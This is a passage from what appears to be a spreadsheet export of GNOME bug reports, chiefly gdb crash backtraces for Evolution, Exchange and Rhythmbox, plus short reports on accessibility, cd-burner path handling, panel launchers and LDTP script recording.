#0  0x413f6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413f69d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x413f2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x4008e30a in e_msgport_wait (mp=0x8187fe8) at e-msgport.c:511
#4  0x4008ec22 in thread_dispatch (din=0x8187f90) at e-msgport.c:874
#5  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 9 (Thread 671752 (LWP 9644)):
#0  0x413f6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413f69d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x413f81bd in __pthread_alt_lock () from /lib/i686/libpthread.so.0
#3  0x413f4fb7 in pthread_mutex_lock () from /lib/i686/libpthread.so.0
#4  0x08064a8e in segv_redirect (sig=11) at main.c:464
#5  0x413f996c in __pthread_sighandler () from /lib/i686/libpthread.so.0
#6  
#7  0x418b67aa in store_folder_renamed (o=0x85479d0 event_data=0x452e5df4
    data=0x0) at mail-folder-cache.c:658
#8  0x419a2a2c in camel_object_trigger_event (vo=0x85479d0
---Type  to continue or q  to quit---
    name=0x420f43bc folder_renamed event_data=0x452e5df4)
    at camel-object.c:1257
#9  0x420f1651 in stub_notification (object=0x8599900 event_data=0xd
    user_data=0x85479d0) at camel-exchange-store.c:672
#10 0x419a2a2c in camel_object_trigger_event (vo=0x8599900
    name=0x420f4860 notification event_data=0xd) at camel-object.c:1257
#11 0x420f3231 in status_main (data=0x8599900) at camel-stub.c:117
#12 0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#13 0x41729327 in clone () from /lib/i686/libc.so.6
Thread 8 (Thread 688135 (LWP 9645)):
#0  0x413f6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413f69d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x413f2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x4008e30a in e_msgport_wait (mp=0x8188ee8) at e-msgport.c:511
#4  0x4008ec22 in thread_dispatch (din=0x81884f0) at e-msgport.c:874
#5  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 7 (Thread 638982 (LWP 9642)):
#0  0x413f6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413f69d8 in __pthread_wait_for_restart_signal ()
---Type  to continue or q  to quit---
   from /lib/i686/libpthread.so.0
#2  0x413f2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x4008e30a in e_msgport_wait (mp=0x8189230) at e-msgport.c:511
#4  0x4008ec22 in thread_dispatch (din=0x81891d8) at e-msgport.c:874
#5  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 6 (Thread 622597 (LWP 9641)):
#0  0x413f6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413f69d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x413f2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x4008e30a in e_msgport_wait (mp=0x8189230) at e-msgport.c:511
#4  0x4008ec22 in thread_dispatch (din=0x81891d8) at e-msgport.c:874
#5  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 5 (Thread 409604 (LWP 9594)):
#0  0x41720b66 in poll () from /lib/i686/libc.so.6
#1  0x415edefc in g_main_context_poll (context=0x852e970 timeout=-1
    priority=2147483647 fds=0x852e7c0 n_fds=1) at gmain.c:2850
#2  0x415ed041 in g_main_context_iterate (context=0x852e970 block=1
    dispatch=1 self=0x852e910) at gmain.c:2527
---Type  to continue or q  to quit---
#3  0x415eda54 in g_main_loop_run (loop=0x85254c8) at gmain.c:2752
#4  0x41b34658 in startup_mainloop (arg=0x0) at e-book.c:2357
#5  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 4 (Thread 606211 (LWP 9640)):
#0  0x413f6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413f69d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x413f2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x4008e30a in e_msgport_wait (mp=0x8189230) at e-msgport.c:511
#4  0x4008ec22 in thread_dispatch (din=0x81891d8) at e-msgport.c:874
#5  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 3 (Thread 16386 (LWP 9439)):
#0  0x41720b66 in poll () from /lib/i686/libc.so.6
#1  0x415edefc in g_main_context_poll (context=0x82b8ec8 timeout=-1
    priority=2147483647 fds=0x8371a48 n_fds=11) at gmain.c:2850
#2  0x415ed041 in g_main_context_iterate (context=0x82b8ec8 block=1
    dispatch=1 self=0x809b080) at gmain.c:2527
#3  0x415eda54 in g_main_loop_run (loop=0x82b8c30) at gmain.c:2752
#4  0x409937ee in link_thread_io_context ()
---Type  to continue or q  to quit---
   from /opt/gnome/lib/libORBitCosNaming-2.so.0
#5  0x41609416 in g_thread_create_proxy (data=0x809b080) at gthread.c:558
#6  0x413f3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#7  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 2 (Thread 32769 (LWP 9438)):
#0  0x41720b66 in poll () from /lib/i686/libc.so.6
#1  0x413f3a8e in __pthread_manager () from /lib/i686/libpthread.so.0
#2  0x41729327 in clone () from /lib/i686/libc.so.6
Thread 1 (Thread 16384 (LWP 9428)):
#0  0x413faab6 in waitpid () from /lib/i686/libpthread.so.0
#1  0x4048100c in libgnomeui_module_info_get ()
   from /opt/gnome/lib/libgnomeui-2.so.0
#2  0x08064a3d in segv_redirect (sig=11) at main.c:455
#3  0x413f996c in __pthread_sighandler () from /lib/i686/libpthread.so.0
#4  
#5  0x413f9b6b in read () from /lib/i686/libpthread.so.0
#6  0x420f5288 in __JCR_LIST__ ()
   from /opt/gnome/lib/evolution/1.5/camel-providers/libcamelexchange.so
#0  0x413faab6 in waitpid () from /lib/i686/libpthread.so.0
(gdb)
(gdb)</t>
  </si>
  <si>
    <t>ATK-144084</t>
  </si>
  <si>
    <t>The gradient options in Desktop Background Preferences arent read properly</t>
  </si>
  <si>
    <t>Using gnome built with gnopernicus 0.9.4 on 31st May 2004
 -Enable Gnopernicus speech 
 -Go to Launch-&gt;Preferences-&gt;Display-&gt;Desktop Background
 -Navigate to the gradient combobox
 -Press  to change the gradient option
Notice that when choosing an option gnopernicus doesn't say what the option is.
It only says 'menu item'.</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-464639</t>
  </si>
  <si>
    <t>Exchange crashes while editing contact in composer</t>
  </si>
  <si>
    <t>#0  0xb6524db3 in strlen () from /lib/libc.so.6
#1  0xb68ee298 in giop_send_buffer_append_string (buf=0x80b21f8 str=0x0)
    at giop-send-buffer.c:515
#2  0xb68fc9f0 in ORBit_marshal_value (buf=0x80b21f8 val=0xb5a7fe98 
    tc=0xb6920cc0) at corba-any.c:217
#3  0xb68f2f08 in orbit_small_marshal (obj=0xb4900fe8 cnx=0x80db160 
    mqe=0xb5a7feec request_id=3047685920 m_data=0xb7de6720 args=0xb5a7ffc8 
    ctx=0x0) at orbit-small.c:353
#4  0xb68f437a in ORBit_small_invoke_stub (obj=0xb4900fe8 m_data=0xb7de6720 
   ret=0x0 args=0xb5a7ffc8 ctx=0x0 ev=0xb5a8000c) at orbit-small.c:646
#5  0xb68f45be in ORBit_small_invoke_stub_n (object=0xb4900fe8 
    methods=0xb7de6964 index=-1247281512 ret=0x0 args=0xb5a7ffc8 ctx=0x0 
    ev=0x0) at orbit-small.c:575
#6  0xb6900dd2 in ORBit_c_stub_invoke (obj=0xb4900fe8 methods=0xb7de6964 
    method_index=8 ret=0x0 args=0xb5a7ffc8 ctx=0x0 ev=0xb5a8000c 
    class_id=0 method_offset=36 
    skel_impl=0xb7d3bb70 ) at poa.c:2643
#7  0xb7d3dde0 in GNOME_Evolution_Addressbook_BookListener_notifyContactRequested (_obj=0xb4900fe8 opid=4 status=GNOME_Evolution_Addressbook_OtherError 
    vcard=0x0 ev=0xb5a8000c) at Evolution-DataServer-Addressbook-stubs.c:258
#8  0xb7d49ae8 in e_data_book_respond_get_contact (book=0x8105a90 opid=4 
    status=GNOME_Evolution_Addressbook_OtherError vcard=0x0)
---Type  to continue or q  to quit---
    at e-data-book.c:690
#9  0xb7d442e0 in _e_book_backend_get_contact (backend=0x80cda48 
    book=0x8105a90 opid=4 
    id=0x82bf129 http://164.99.168.213/exchange/akhil/Contacts/asd.EML)
    at e-book-backend-sync.c:427
#10 0xb7d45ce7 in e_book_backend_get_contact (backend=0x80cda48 
    book=0x8105a90 opid=4 
    id=0x82bf129 http://164.99.168.213/exchange/akhil/Contacts/asd.EML)
    at e-book-backend.c:260
#11 0xb7d4a943 in impl_GNOME_Evolution_Addressbook_Book_getContact (
    servant=0x8105aa4 opid=4 
    id=0x82bf129 http://164.99.168.213/exchange/akhil/Contacts/asd.EML 
    ev=0xb5a802c8) at e-data-book.c:65
#12 0xb7d3b74a in _ORBIT_skel_small_GNOME_Evolution_Addressbook_Book_getContact
    (_o_servant=0x8105aa4 _o_retval=0x0 _o_args=0xb5a801a0 
    _o_ctx=0xb5a801fc _o_ev=0xb5a802c8 
    _impl_getContact=0xb7d4a8e0 ) at Evolution-DataServer-Addressbook-common.c:56
#13 0xb6900ba7 in ORBit_POAObject_invoke (pobj=0xb4901a88 ret=0x0 
    args=0xb5a801a0 ctx=0xb5a801fc data=0xb5a80278 ev=0xb5a802c8)
    at poa.c:1142
#14 0xb6906cd5 in ORBit_OAObject_invoke (adaptor_obj=0xb4901a88 ret=0x0 
    args=0xb5a801a0 ctx=0xb5a801fc data=0xb5a80278 ev=0xb5a802c8)
---Type  to continue or q  to quit---
    at orbit-adaptor.c:338
#15 0xb68f3e37 in ORBit_small_invoke_adaptor (adaptor_obj=0xb4901a88 
    recv_buffer=0xb4903588 m_data=0xb7de6160 data=0xb5a80278 ev=0xb5a802c8)
    at orbit-small.c:844
#16 0xb6904996 in ORBit_POAObject_handle_request (pobj=0xb4901a88 
    opname=0xb4901a04 getContact ret=0x0 args=0x0 ctx=0x0 
    recv_buffer=0xb4903588 ev=0xb5a802c8) at poa.c:1351
#17 0xb6905042 in ORBit_POAObject_invoke_incoming_request (pobj=0xb4901a88 
    recv_buffer=0xb4903588 opt_ev=0x0) at poa.c:1421
#18 0xb68ecddd in giop_thread_queue_process (tdata=0xb49046b8) at giop.c:771
#19 0xb68ed6b8 in giop_request_handler_thread (data=0xb49046b8 user_data=0x0)
    at giop.c:481</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-338972</t>
  </si>
  <si>
    <t>Can't burn a file from the command line with a relative path</t>
  </si>
  <si>
    <t>Anything with
nautilus-cd-burner --source-iso=file.iso
nautilus-cd-burner --source-cue=file.cue
is going to fail if file.iso/file.cue is given in a relative path to the current directory.  It gives the error WARNING **: Only local files are supported at this time.
expand_path_input calls gnome_vfs_make_uri_from_input on the argument given.  But gnome_vfs_make_uri_from_input SPECIFICALLY doesn't support relative paths to the current directory:
http://developer.gnome.org/doc/API/2.0/gnome-vfs-2.0/gnome-vfs-20-gnome-vfs-utils.html#gnome-vfs-make-uri-from-input
You need to call gnome_vfs_make_uri_from_input_with_dirs relative to the current directory:
http://developer.gnome.org/doc/API/2.0/gnome-vfs-2.0/gnome-vfs-20-gnome-vfs-utils.html#gnome-vfs-make-uri-from-input-with-dirs
The behavior is really unexpected.  It's arguably even worse than the behavior mentioned in Bug 327574 that the current patch tried to fix.</t>
  </si>
  <si>
    <t>thacker</t>
  </si>
  <si>
    <t>RHYTHMBOX-470363</t>
  </si>
  <si>
    <t>crash in Rhythmbox Music Player: Opened Rhythmbox enable...</t>
  </si>
  <si>
    <t>Version: 0.10.1
What were you doing when the application crashed?
Opened Rhythmbox enabled Last.fm plugin
Distribution: Debian lenny/sid
Gnome Release: 2.18.3 2007-07-03 (Debian)
BugBuddy Version: 2.18.1
System: Linux 2.6.22-hrt6-mac80211-904 #1 SMP Mon Aug 20 09:50:55 CEST 2007 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks-gperfection2
Icon Theme: gperfection2
Memory status: size: 371712000 vsize: 371712000 resident: 34095104 share: 17498112 rss: 34095104 rss_rlim: 18446744073709551615
CPU usage: start_time: 1188111299 rtime: 130 utime: 115 stime: 15 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/rhythmbox'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 47797816808928 (LWP 6586)]
[New Thread 1090525520 (LWP 6591)]
(no debugging symbols found)
0x00002b78c330cc7f in waitpid () from /lib/libpthread.so.0
#0  0x00002b78c330cc7f in waitpid () from /lib/libpthread.so.0
#1  0x00002b78c44106d0 in ?? () from /usr/lib/libgnomeui-2.so.0
#2  
#3  0x00002b78c971b635 in raise () from /lib/libc.so.6
#4  0x00002b78c971d090 in abort () from /lib/libc.so.6
#5  0x00002b78c90142b5 in g_logv () from /usr/lib/libglib-2.0.so.0
#6  0x00002b78c9014343 in g_log () from /usr/lib/libglib-2.0.so.0
#7  0x00002b78c90143c6 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
#8  0x000000000045dfe1 in rhythmdb_get_property_type ()
#9  0x0000000000466bba in rhythmdb_read_encoded_property ()
#10 0x000000000046f9d6 in ?? ()
#11 0x000000000045eda7 in rhythmdb_entry_register_type ()
#12 0x00002aaab023137c in rb_lastfm_source_new ()
   from /usr/lib/rhythmbox/plugins/audioscrobbler/libaudioscrobbler.so
#13 0x00002aaab022e183 in ?? ()
   from /usr/lib/rhythmbox/plugins/audioscrobbler/libaudioscrobbler.so
#14 0x000000000045b103 in rb_plugins_engine_activate_plugin ()
#15 0x0000000000459fad in ?? ()
#16 0x000000000045a153 in ?? ()
#17 0x000000000045a54f in ?? ()
#18 0x00002b78c824e92a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
#19 0x00002b78c825e5f8 in ?? () from /usr/lib/libgobject-2.0.so.0
#20 0x00002b78c825fa33 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
#21 0x00002b78c825fc03 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#22 0x00002b78c58bc409 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#23 0x00002b78c5a5a018 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#24 0x00002b78c5a5a2e5 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#25 0x00002b78c5a56933 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#26 0x00002b78c5969c4d in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#27 0x00002b78c824e92a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
#28 0x00002b78c825ec08 in ?? () from /usr/lib/libgobject-2.0.so.0
#29 0x00002b78c825f807 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
#30 0x00002b78c825fc03 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#31 0x00002b78c5a6747e in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#32 0x00002b78c596323d in gtk_propagate_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
#33 0x00002b78c5964251 in gtk_main_do_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
#34 0x00002b78c5e0894c in ?? () from /usr/lib/libgdk-x11-2.0.so.0
#35 0x00002b78c900bd93 in g_main_context_dispatch ()
   from /usr/lib/libglib-2.0.so.0
#36 0x00002b78c900f08d in ?? () from /usr/lib/libglib-2.0.so.0
#37 0x00002b78c900f39a in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#38 0x00002b78c59645e3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#39 0x00000000004223f2 in main ()
Thread 2 (Thread 1090525520 (LWP 6591)):
#0  0x00002b78c3309997 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/libpthread.so.0
No symbol table info available.
#1  0x00002b78c888f5d0 in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#2  0x00002b78c8fefe63 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x00002b78c8feff71 in g_async_queue_timed_pop ()
   from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x000000000046147d in ?? ()
No symbol table info available.
#5  0x00002b78c902d4b4 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x00002b78c3305317 in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0x00002b78c97bdb1d in clone () from /lib/libc.so.6
No symbol table info available.
#8  0x0000000000000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 47797816808928 (LWP 6586)):
#0  0x00002b78c330cc7f in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x00002b78c44106d0 in ?? () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x00002b78c971b635 in raise () from /lib/libc.so.6
No symbol table info available.
#4  0x00002b78c971d090 in abort () from /lib/libc.so.6
No symbol table info available.
#5  0x00002b78c90142b5 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x00002b78c9014343 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x00002b78c90143c6 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0x000000000045dfe1 in rhythmdb_get_property_type ()
No symbol table info available.
#9  0x0000000000466bba in rhythmdb_read_encoded_property ()
No symbol table info available.
#10 0x000000000046f9d6 in ?? ()
No symbol table info available.
#11 0x000000000045eda7 in rhythmdb_entry_register_type ()
No symbol table info available.
#12 0x00002aaab023137c in rb_lastfm_source_new ()
   from /usr/lib/rhythmbox/plugins/audioscrobbler/libaudioscrobbler.so
No symbol table info available.
#13 0x00002aaab022e183 in ?? ()
   from /usr/lib/rhythmbox/plugins/audioscrobbler/libaudioscrobbler.so
No symbol table info available.
#14 0x000000000045b103 in rb_plugins_engine_activate_plugin ()
No symbol table info available.
#15 0x0000000000459fad in ?? ()
No symbol table info available.
#16 0x000000000045a153 in ?? ()
No symbol table info available.
#17 0x000000000045a54f in ?? ()
No symbol table info available.
#18 0x00002b78c824e92a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x00002b78c825e5f8 in ?? () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x00002b78c825fa33 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x00002b78c825fc03 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x00002b78c58bc409 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x00002b78c5a5a018 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x00002b78c5a5a2e5 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0x00002b78c5a56933 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#26 0x00002b78c5969c4d in ?? () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0x00002b78c824e92a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x00002b78c825ec08 in ?? () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x00002b78c825f807 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x00002b78c825fc03 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0x00002b78c5a6747e in ?? () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x00002b78c596323d in gtk_propagate_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0x00002b78c5964251 in gtk_main_do_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#34 0x00002b78c5e0894c in ?? () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#35 0x00002b78c900bd93 in g_main_context_dispatch ()
   from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#36 0x00002b78c900f08d in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#37 0x00002b78c900f39a in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#38 0x00002b78c59645e3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x00000000004223f2 in main ()
No symbol table info available.
#0  0x00002b78c330cc7f in waitpid () from /lib/libpthread.so.0
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors ---------------------
RhythmDB-ERROR **: file rhythmdb.c: line 4538 (rhythmdb_get_property_type): assertion failed: (property_id &gt;= 0 &amp;&amp; property_id &lt; RHYTHMDB_NUM_PROPERTIES)
aborting...
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:52: Clearlooks configuration option menuitemstyle is not supported and will be ignored.
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:53: Clearlooks configuration option listviewitemstyle is not supported and will be ignored.
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:54: Clearlooks configuration option progressbarstyle is not supported and will be ignored.
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:52: Clearlooks configuration option menuitemstyle is not supported and will be ignored.
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:53: Clearlooks configuration option listviewitemstyle is not supported and will be ignored.
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:54: Clearlooks configuration option progressbarstyle is not supported and will be ignored.
RhythmDB-ERROR **: file rhythmdb.c: line 4538 (rhythmdb_get_property_type): assertion failed: (property_id &gt;= 0 &amp;&amp; property_id &lt; RHYTHMDB_NUM_PROPERTIES)
aborting...
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:52: Clearlooks configuration option menuitemstyle is not supported and will be ignored.
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:53: Clearlooks configuration option listviewitemstyle is not supported and will be ignored.
/home/jack/.themes/Clearlooks-gperfection2/gtk-2.0/gtkrc:54: Clearlooks configuration option progressbarstyle is not supported and will be ignored.
--------------------------------------------------</t>
  </si>
  <si>
    <t>malmostoso</t>
  </si>
  <si>
    <t>GNOME-PANEL-355513</t>
  </si>
  <si>
    <t>panel launchers get emptied after left mouse button drag&amp;dropping twice</t>
  </si>
  <si>
    <t>That bug has been opened on https://launchpad.net/distros/ubuntu/+source/gnome-panel/+bug/59431
Version: current Edgy on two different computers
A panel launcher loses all of its contents after it has been moved on the panel with the left mouse button twice.
Steps to recreate:
- Add a panel launcher
- Click and holde the left mouse button move to a different location then release the button
- Repeat the last step
- The panel launcher's icon changes to the icon missing icon and looking at the icon's settings reveals that the Name Command and Description fields are empty.
This does not happen when using the middle mouse button to move the launchers.
...</t>
  </si>
  <si>
    <t>LDTP-341224</t>
  </si>
  <si>
    <t>ldtprecord</t>
  </si>
  <si>
    <t>Recorded script can't run correctly by ldtp</t>
  </si>
  <si>
    <t>Please describe the problem:
Recorded script can't run correctly by ldtp
Enviorment: 
Ubuntu 5.10
The latest veresion of Record
Steps to reproduce:
1. record gcalctool
2. do some operation
3. run the recorded script
4. recorded script like this:
click ('gcalctool' 'btnNumeric9')
5. run it
Actual results:
error occured
Expected results:
script shoud runs smoothly
Does this happen every time?
yes
Other information:
ldtp runs correctly if change the script like the following:
click ('frmCalculator-Basic' 'btnNumeric9')</t>
  </si>
  <si>
    <t>shagan.glare</t>
  </si>
  <si>
    <t>hao.yu</t>
  </si>
  <si>
    <t>EVOLUTION-380025</t>
  </si>
  <si>
    <t>crash in Evolution: Setting up a view in tod...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Setting up a view in todo list.
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 268423168 vsize: 0 resident: 268423168 share: 0 rss: 39636992 rss_rlim: 0
CPU usage: start_time: 1164687748 rtime: 0 utime: 2850 stime: 0 cutime:2642 cstime: 0 timeout: 208 it_real_value: 0 frequency: 3
Backtrace was generated from '/usr/bin/evolution-2.8'
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1232779600 (LWP 25076)]
[New Thread -1387476064 (LWP 32598)]
[New Thread -1311081568 (LWP 32595)]
[New Thread -1377363040 (LWP 25261)]
[New Thread -1368183904 (LWP 25257)]
[New Thread -1320297568 (LWP 25157)]
[New Thread -1302688864 (LWP 25152)]
[New Thread -1294296160 (LWP 25151)]
[New Thread -1285903456 (LWP 25150)]
[New Thread -1277510752 (LWP 25149)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb71956cb in waitpid () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7ea11b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  0x0805f8e9 in segv_redirect (sig=11) at main.c:426
#4  
#5  0xb6e7a01c in e_table_state_save_to_node (state=0x0 parent=0x0)
    at e-table-state.c:254
#6  0xb6e7a1fe in e_table_state_save_to_file (state=0x0 
    filename=0x8ce8bb8 /home/lorenco/.evolution/tasks/views/Default.galview)
    at e-table-state.c:215
#7  0xb4003aa8 in gal_view_etable_save (view=0x8b01628 
    filename=0x8ce8bb8 /home/lorenco/.evolution/tasks/views/Default.galview)
    at gal-view-etable.c:103
#8  0xb4006c2d in gal_view_save (view=0x8b01628 
    filename=0x8ce8bb8 /home/lorenco/.evolution/tasks/views/Default.galview)
    at gal-view.c:92
#9  0xb40022c7 in gal_view_collection_save (collection=0x899bf70)
    at gal-view-collection.c:543
#10 0xb4000653 in dialog_response (dialog=0x83ad9a0 response_id=-7 data=0x0)
    at gal-define-views-dialog.c:238
#11 0xb7612879 in g_cclosure_marshal_VOID () from /usr/lib/libgobject-2.0.so.0
#12 0xb760579b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#13 0xb7615b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#14 0xb76170b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#15 0xb7617279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#16 0xb7960f5a in gtk_dialog_response () from /usr/lib/libgtk-x11-2.0.so.0
#17 0xb7960fb5 in gtk_dialog_response () from /usr/lib/libgtk-x11-2.0.so.0
#18 0xb7612b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#19 0xb760579b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#20 0xb7615b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#21 0xb76170b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#22 0xb7617279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#23 0xb7915093 in gtk_button_clicked () from /usr/lib/libgtk-x11-2.0.so.0
#24 0xb7916cde in gtk_button_set_alignment ()
   from /usr/lib/libgtk-x11-2.0.so.0
#25 0xb7612b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#26 0xb7603fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#27 0xb760579b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#28 0xb761602a in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#29 0xb76170b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#30 0xb7617279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#31 0xb7915123 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
#32 0xb7915181 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
#33 0xb79e4b00 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#34 0xb7603fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#35 0xb760579b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#36 0xb76161e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#37 0xb7616e7f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#38 0xb7617279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#39 0xb7af85f8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#40 0xb79ddef3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#41 0xb79df0f7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
